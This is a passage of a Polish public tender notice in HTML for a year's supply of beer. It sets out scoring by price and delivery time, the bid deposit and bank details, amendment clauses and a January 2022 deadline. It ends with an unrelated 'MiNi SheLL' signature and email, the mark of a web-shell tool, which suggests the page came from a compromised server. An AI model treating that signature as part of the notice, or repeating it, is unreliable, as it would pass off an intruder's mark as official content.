zobowiązany będzie do dostarczenia wielu rodzajów <br/>i gatunków piwa.<br/>W związku z powyższym, jeżeli Wykonawca oferuje produkty równoważne, musi zapewnić wielość ich rodzajów i gatunków, nie mniejszą niż ilość rodzajów<br/>i gatunków wskazanych w SWZ oraz spełnić wszystkie wymagania tam zawarte. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15961000-2 - Piwo</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ad. 1 Za kryterium cena Wykonawca może otrzymać maksymalnie – 60 punktów. <br/><br/>Liczba punktów wg kryterium cena „C” zostanie obliczona na podstawie poniższego wzoru: <br/> Cn <br/>C = ------------x 60<br/> Cob <br/> gdzie: <br/>C - liczba punktów za kryterium cena<br/>Cn - najniższa cena brutto <br/>Cob - cena brutto oferty badanej <br/><br/>Ad. 2 Za kryterium - termin dostawy (T), Wykonawca może otrzymać maksymalnie 40 punktów.<br/>Liczba punktów w ramach kryterium termin realizacji jednostkowego zamówienia zostanie przyznana w następujący sposób:<br/>	za 5 dni roboczych – 0 pkt<br/>	za 4 dni robocze – 10 pkt<br/>	za 3 dni robocze – 30 pkt<br/>	za 2 dni robocze – 40 pkt<br/><br/>Termin dostawy liczony jest od następnego dnia po dniu, otrzymania zamówienia..<br/> <br/>Uwaga: Wykonawca nie może zaproponować terminu realizacji jednostkowego zamówienia innego niż podane powyżej. Jeżeli Wykonawca zaproponuje termin realizacji jednostkowego zamówienia, krótszy niż 2 dni robocze lub dłuższy niż 5 dni roboczych, bądź poda wartość inną niż w/w to Zamawiający uzna taką ofertę za niezgodną z treścią SWZ i oferta zostanie odrzucona na podstawie art. 226 ust. 1 pkt. 5 ustawy Prawo zamówień Publicznych (Dz. U. <br/>z 2021 r. poz. 1129). <br/> <br/>Punkty uzyskane przez ofertę zostaną zsumowane wg wzoru:<br/><br/>Su = C + T<br/> gdzie:<br/>Su - suma punktów wg przyjętych kryteriów; <br/>C - liczba punktów za kryterium cena;<br/>T - liczba punktów za kryterium termin realizacji jednostkowego zamówienia.<br/>3.	Zamawiający przy wyliczaniu punktów za poszczególne kryteria ograniczy się do dwóch miejsc po przecinku.<br/>4.	Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium <br/>o najwyższej wadze.<br/>5.	Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną lub najniższym kosztem.<br/>6.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. <br/>7.	Jeżeli Zamawiający nie będzie prowadził negocjacji, dokona wyboru najkorzystniejszej oferty spośród ofert niepodlegających odrzuceniu.<br/>8.	Weryfikacja kryteriów opisanych w punktach 2, dokonywana będzie na podstawie oświadczenia dokonanego w załącznikach nr 1.1, 1.2 do SWZ – Formularz ofertowy. Brak oświadczenia będzie oceniane jako brak gwarancji dostarczania przedmiotu zamówienia spełniającego zadeklarowane kryteria w okresie obowiązywania umowy, co stanowić będzie <br/>o niezgodności treści oferty z warunkami zamówienia SWZ;</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji jednostkowego zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">-	oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia <br/>16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. <br/>poz. 369), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia <br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 3 do SWZ;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> przedmiotowe środki dowodowe, załączone do oferty zgodnie z art. 106 ustawy Pzp, dokumenty potwierdzające zgodność oferowanych dostaw z wymaganiami określonymi w opisie przedmiotu zamówienia). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> W przypadku, gdy Wykonawca powołuje się na rozwiązania równoważne ma on obowiązek wykazać (poprzez załączenie do oferty odpowiednich dokumentów), że oferowane przez niego dostawy spełniają wymagania dotyczące równoważności określone przez Zamawiającego.<br/>Jeżeli Wykonawca nie przedłoży przedmiotowych środków dowodowych lub przedmiotowe środki dowodowe są niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym przez Zamawiającego terminie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości na Część – I - 300,00 zł.<br/>Część – II - 1000,00 zł.<br/>2.	Zgodnie z art. 97 ust. 7 Pzp wadium może być wnoszone według wyboru wykonawcy <br/>w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>3.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy nr 62 1130 1017 0020 1546 2290 0001 w Bank Gospodarstwa Krajowego w Warszawie <br/>z dopiskiem „wadium w postępowaniu PK.ZZP.261.47-48.2021 na Część ……..”. Wniesienie wadium w pieniądzu przelewem na rachunek bankowy wskazany przez zamawiającego będzie skuteczne z chwilą uznania tego rachunku bankowego kwotą wadium (jeżeli wpływ środków pieniężnych na rachunek bankowy wskazany przez zamawiającego nastąpi przed upływem terminu składania ofert).<br/>4.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa <br/>w art. 97 ust. 7 pkt 2-4 Pzp, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>5.	W przypadku wadium wniesionego w pieniądzu oraz z treści gwarancji i poręczeń, <br/>o których mowa w art. 97 ust. 7 pkt 2-4 Pzp, (jeżeli wadium będzie wniesione w tych formach), musi wynikać, że wadium zabezpiecza ofertę wykonawcy złożoną <br/>w postępowaniu o udzielenie zamówienia publicznego - „na Część ……..” Oznaczenie sprawy: PK.ZZP.261.47-48.2021. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość dokonania następujących zmian treści umowy:<br/>1) wystąpienia nadzwyczajnych okoliczności jeżeli wskaźnik wzrostu cen towarów dla poszczególnych grup produktów, opublikowany przez Główny Urząd Statystyczny <br/>w publikacji „Wskaźniki cen towarów i usług konsumpcyjnych”, ulegnie zmianie <br/>o minimum 5% w porównaniu do wskaźnika wzrostu cen towarów z miesiąca poprzedniego z zastrzeżeniem ust. 2.<br/>2) zmiany stawki podatku od towarów i usług;<br/>-	jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.<br/>3) Zamawiający dopuszcza możliwość zmiany do 20% gwarantowanego świadczenia umowy, o którym mowa w § 1 ust. 2, w sytuacjach wystąpienia okoliczności niezależnych, których Zamawiający nie mógł przewidzieć na etapie przygotowania zamówienia, tj. wprowadzenie nauki zdalnej w wyniku pandemii;<br/>4) Zamawiający dopuszcza możliwość zmiany w zakresie asortymentu ujętego <br/>w formularzu ofertowym polegającej na trzykrotnym zwiększeniu ilości określonych <br/>w tabeli formularza ofertowego poszczególnych asortymentów z zachowaniem ich cen jednostkowych z jednoczesnym zmniejszeniem ilości innych asortymentów w ramach wartość umowy brutto określonej w §4 ust. 5.<br/>2. W przypadku wystąpienia okoliczności o, których mowa w ust. 1 pkt. 1 Wykonawca składa pisemny wniosek do Zamawiającego uzasadniający zmianę cen poszczególnych asortymentów w stosunku do cen obowiązujących w umowie. Z wnioskiem o zmianę cen, Wykonawca może wystąpić dwukrotnie w okresie obowiązywania umowy z zastrzeżeniem, że pierwszy wniosek nie wpłynie wcześniej niż po upływie 3 miesięcy od dnia obowiązywania umowy.<br/>3.	W sytuacji wystąpienia okoliczności wskazanych w ust. 1 pkt 2 Wykonawca składa pisemny wniosek o zmianę umowy o zamówienie publiczne w zakresie płatności po wejściu w życie przepisów zmieniających stawkę podatku od towarów i usług. Wniosek powinien zawierać wyczerpujące uzasadnienie faktyczne i prawne oraz dokładne wyliczenie kwoty wynagrodzenia Wykonawcy po zmianie umowy, przy czym wysokość wynagrodzenia netto pozostaje bez zmian, natomiast zmianie w drodze aneksu podlegać będzie wysokość wynagrodzenia brutto w ten sposób, że zostanie ona odpowiednio dostosowana do zmienionej stawki VAT.<br/>4.	Zamawiający po dokonaniu analizy wniosków, o których mowa w ust. 2 i 3, wyznacza datę negocjacji w celu ustalenia ostatecznej wysokości zmiany wynagrodzenia.<br/>5.	Zmiana umowy skutkuje zmianą wynagrodzenia jedynie w zakresie płatności realizowanych po dacie zawarcia aneksu do umowy.<br/>6.	Obowiązek wykazania wpływu zmian, na koszty wykonania zamówienia należy do Wykonawcy pod rygorem odmowy dokonania zmiany umowy przez Zamawiającego. <br/>7.	W przypadku zmiany, o której mowa w ust. 1 pkt. 3, z wnioskiem o zmianę umowy, może wystąpić Zamawiający. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym bądź podpisem osobistym za pośrednictwem Platformy pod adresem: https://akademia-mil.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-10 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com